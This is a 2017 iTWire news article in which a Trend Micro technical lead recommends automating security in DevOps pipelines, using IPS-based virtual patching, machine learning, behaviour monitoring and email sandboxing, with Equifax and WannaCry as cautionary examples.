Security Market Segment LS


Failed loading XML...
Tuesday, 14 November 2017 17:37

Integrate security into operations and make it easier for everyone, says Trend Micro


Mick McCluney, ANZ Technical Lead for security software vendor Trend Micro, says better enterprise cyber security can be yours, with these simple steps.

In today’s real-time enterprise, with a focus on doing more with less, it is tempting for technical teams to take shortcuts. In software development this is often labelled “technical debt” but it applies equally to infrastructure.

Forgetting to manually apply security controls is a victim of shortcuts resulting in servers put into production without adequate protection, and with high-risk vulnerabilities open for exploitation. A recent prominent example is Equifax, revealing the identity and credit details of well over a 100 million US citizens and pinned down to unpatched software.

McCluney took a break from presenting at VMware’s vForum event in Sydney to speak to iTWire. “When we build workloads in virtualised environments, we must understand their security posture at the beginning and deploy their security when we deploy the workload,” he said.

“Some of the things we encourage people to do are look at event-based tasks to look at new workloads and automatically deploy the right security policy to those workloads as they come online.

“As people talk about automation they talk about APIs. They talk about building a workload by API, amending a policy by API, and so on - this is transformative IT where your pipeline is driven by these orchestration tools. Security has to fit right in there.”

For example, he says, “you can have application control, which again can be API-driven, so when you're deploying your code from your orchestration tools they can call the API to put the workload into maintenance mode while deploying, then use the API again to lock the executable code down".

This is great, McCluney says, “because you’ve worked with DevOps and put security into the process and it's not a pain. This can be done in prod and test and so on through the whole pipeline".

“The more you can integrate your security into your operational processes the easier it is for everyone to be security-aware and compliant as part of their normal process.

“Our approach at Trend Micro is to have recommendation scans on servers that look for vulnerabilities either at an Operating System level or the application layer, then allow an Intrusion Protection System (IPS) ruleset to protect the server from vulnerabilities on the applications or operating system.”

To clarify, McCluney points to well-publicised security vulnerabilities of recent years — ShellShock and Heartbleed — as well as Apache Struts, WordPress and Oracle vulnerabilities.

“Trend Micro’s view is if we can understand the vulnerability, we can create an IPS rule for it, and that can be deployed to your workload automatically.

“With ShellShock we were protecting customers from hundreds of attacks within five days.”

Complexity in security exists, and it’s because “no single approach works,” McCluney says. “You need multiple layers and you need automation as well. Trend Micro helps with host-based IPS, as well as deep security products like Machine Learning (ML), file integrity monitoring, log monitoring, application control, file warning and behaviour monitoring.

"For example, if we see ransomware executing on an endpoint we can prevent it from running. We can use ML to see if an unknown file looks suspicious. It may not be known in our global intelligence cloud so the software will watch it. If it starts encrypting files then we can stop it on the third one and roll its changes back.

“We’ve had behaviour monitoring for eight years. We’ve had ML for a year or so in some products, and will roll it out through the rest.”


Even so, “signatures still play a useful role, because we see we can knock out a lot of known bad at low cost. Signatures offer a good black-and-white defence. Then if it’s unknown, we can use ML capabilities on it. If we still can’t decide, we can let it run but use runtime ML to look at the calls it's making, and look for identifiable patterns and behaviour monitoring in terms of what it's running so we catch zero day exploits and ransomware. This has been a successful approach,” he says. “The next layer after that — the ultimate test — is sandboxing.”

There is big money in ransomware and business email compromises, McCluney says, estimating it is in billions of dollars. “There’s a lot of R&D into the next compromise, which is why ML is so important.”

Trend purchased Tipping Point from Hewlett Packard two years ago, and with this came Digital Vaccine labs, who run “zero day threat initiative”, dedicated to early identification of threats. “We're finding out about these vulnerabilities and as soon as we find out we can inform the vendor and write IPS rules to protect our customers and provide protection around those vulnerabilities.”

“That links into our virtual patching which is about having the right IPS rules on the right server based on the recommendation scan. It can detect you have, say, ‘abc’ software on ‘xyz’ server and then have it download and run those rules.”

When asked for his number one security tip, McCluney says “the capability to use IPS to prevent attacks on known vulnerabilities is a great mitigating control.”

“With Equifax, Apache Struts had a vulnerability. Maybe it couldn’t be patched quickly enough, but where was the mitigating control?” he asks.

“A company should have had an IPS. It’s the same with WannaCry – ok, you may not be able to patch the vulnerability, but did you have anything else to protect you? The mitigating control is important,” McCluney states.

“The other thing that comes top of mind to me is a significant amount of attacks come through email. Do you have an email defensive system applying proper sandboxing? Are you taking the threats out of email, putting them in a sandbox, detonating them, to see if they are malicious, and can you prevent them at that stage? I couldn’t recommend more the need to have a good layer policy on email coming in.

“From an endpoint policy point of view, if it's got to the machine through the email, and someone’s hit the link, you need to concentrate on what layers you have available and if you can catch things as they run. This is where endpoint ML and behaviour monitoring come in.

“I’d recommend any organisation think about security at the beginning and having that as part of the operational pipeline. Multiple layers of defence are needed. Anti-malware signatures are good, but behaviour monitoring, ML, app control, file integrity monitoring and log monitoring are all great things to have in your armoury.”

While Trend Micro is an international organisation, founded in Los Angeles, global headquarters in Tokyo, and an R&D centre in Taipei, it is doing good things in Australia.

“One of our data scientists in Melbourne, Jon Oliver, is very influential in our ML capabilities. He was instrumental in the way we focused on ransomware within the company. He saw the attack on Australia in a strong way two years ago, and a lot of the protections Trend Micro brought in were based on thought leadership from this country. Jon has over 100 patents to his name,” McCluney says.

Read 2922 times

Please join our community here and become a VIP.

Subscribe to ITWIRE UPDATE Newsletter here
JOIN our iTWireTV our YouTube Community here


If you're looking at enabling Microsoft Teams for your contact centre, you should bookmark this webinar.

Marketing budgets are now focused on Webinars combined with Lead Generation.

Our panellists from Whangarei District Council (NZ) and Maurice Blackburn Lawyers (Aus) were closely involved in recent projects to enable Microsoft Teams for their own contact centres.

They have kindly agreed to join Enghouse and Microsoft to talk about some of the things they would recommend as most critical for IT and CX professionals planning a Teams Contact Centre migration.

Date: 11 May 2022
Time: 12pm AEST | 2pm NZST | 10am SGT

We look forward to having you join us. Please click the button below to register.



The past year has seen a meteoric rise in ransomware incidents worldwide.

Over the past 12 months, SonicWall Capture Labs threat researchers have diligently tracked the meteoric rise in cyberattacks, as well as trends and activity across all threat vectors, including:

Encrypted threats
IoT malware
Zero-day attacks and more

These exclusive findings are now available via the 2022 SonicWall Cyber Threat Report, which ensures SMBs, government agencies, enterprises and other organizations have the actionable threat intelligence needed to combat the rising tide of cybercrime.

Click the button below to get the report.



It's all about Webinars.

Marketing budgets are now focused on Webinars combined with Lead Generation.

If you wish to promote a Webinar we recommend at least a 3 to 4 week campaign prior to your event.

The iTWire campaign will include extensive adverts on our News Site and prominent Newsletter promotion and Promotional News & Editorial. Plus a video interview of the key speaker on iTWire TV which will be used in Promotional Posts on the iTWire Home Page.

Now we are coming out of Lockdown iTWire will be focussed to assisting with your webinars and campaigns and assistance via part payments and extended terms, a Webinar Business Booster Pack and other supportive programs. We can also create your adverts and written content plus coordinate your video interview.

We look forward to discussing your campaign goals with you. Please click the button below.


David M Williams

David has been computing since 1984 where he instantly gravitated to the family Commodore 64. He completed a Bachelor of Computer Science degree from 1990 to 1992, commencing full-time employment as a systems analyst at the end of that year. David subsequently worked as a UNIX Systems Manager, Asia-Pacific technical specialist for an international software company, Business Analyst, IT Manager, and other roles. David has been the Chief Information Officer for national public companies since 2007, delivering IT knowledge and business acumen, seeking to transform the industries within which he works. David is also involved in the user group community, the Australian Computer Society technical advisory boards, and education.

Share News tips for the iTWire Journalists? Your tip will be anonymous




Guest Opinion

Guest Interviews

Guest Reviews

Guest Research

Guest Research & Case Studies

Channel News